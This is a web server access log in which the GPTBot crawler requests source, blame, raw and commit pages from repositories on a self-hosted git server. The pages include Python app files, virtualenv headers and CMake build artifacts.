-[17/Feb/2026:16:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude?display=source" [Client 74.7.227.38] [Length 15323] [Gzip 4.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude" -[17/Feb/2026:16:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude" -[17/Feb/2026:16:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 10053] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv" -[17/Feb/2026:16:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 10086] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv" -[17/Feb/2026:16:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11055] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json" -[17/Feb/2026:16:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10317] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11594] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=source" [Client 74.7.227.38] [Length 15790] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:16:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=rendered" [Client 74.7.227.38] [Length 11107] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:16:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:16:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=source" [Client 74.7.227.38] [Length 15783] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:16:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11029] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json" -[17/Feb/2026:16:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11600] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 10316] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:16:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9954] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:16:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33675] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 15766] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:16:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11055] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9966] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:16:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10806] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:16:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10938] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:16:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include" -[17/Feb/2026:16:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site" -[17/Feb/2026:16:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43109] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21745] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:27:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 9965] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:16:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 17258] [Gzip 9.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:16:27:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 4755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:16:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9936] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12" -[17/Feb/2026:16:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:16:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg?display=source" [Client 74.7.227.38] [Length 11222] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py?display=rendered" [Client 74.7.227.38] [Length 10968] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py?display=source" [Client 74.7.227.38] [Length 12340] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py" -[17/Feb/2026:16:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg?display=source" [Client 74.7.227.38] [Length 11252] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude?display=source" [Client 74.7.227.38] [Length 15291] [Gzip 4.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude" -[17/Feb/2026:16:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py?display=source" [Client 74.7.227.38] [Length 12310] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py" -[17/Feb/2026:16:27:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr 